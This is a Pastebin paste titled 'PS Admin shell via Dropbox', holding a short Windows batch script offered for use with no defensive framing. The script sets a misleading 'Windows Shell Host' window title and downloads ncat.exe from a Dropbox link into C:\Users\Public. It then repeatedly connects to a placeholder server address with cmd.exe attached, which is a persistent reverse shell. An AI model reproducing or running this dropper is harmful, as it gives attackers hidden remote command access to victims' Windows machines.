Shiva108

PS Admin shell via Dropbox

Mar 23rd, 2019
283
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 0.39 KB | None | 0 0
  1. rem Made by LiamBogur
  2. @echo off
  3. title Windows Shell Host
  4. echo Please Wait..
  5. cd C:\Users\Public
  6. if exist ncat.exe goto B
  7. :A
  8. powershell /c Invoke-WebRequest -Uri https://www.dropbox.com/s/66vqjqwvqzjiy2d/ncat.exe?dl=1 -OutFile "ncat.exe" || goto A
  9. :B
  10. echo Trying to connect..
  11. C:\Users\Public\ncat.exe serverip serverport -e C:\Windows\System32\cmd.exe 2>nul || echo Connection failed
  12. goto B
Add Comment
Please, Sign In to add comment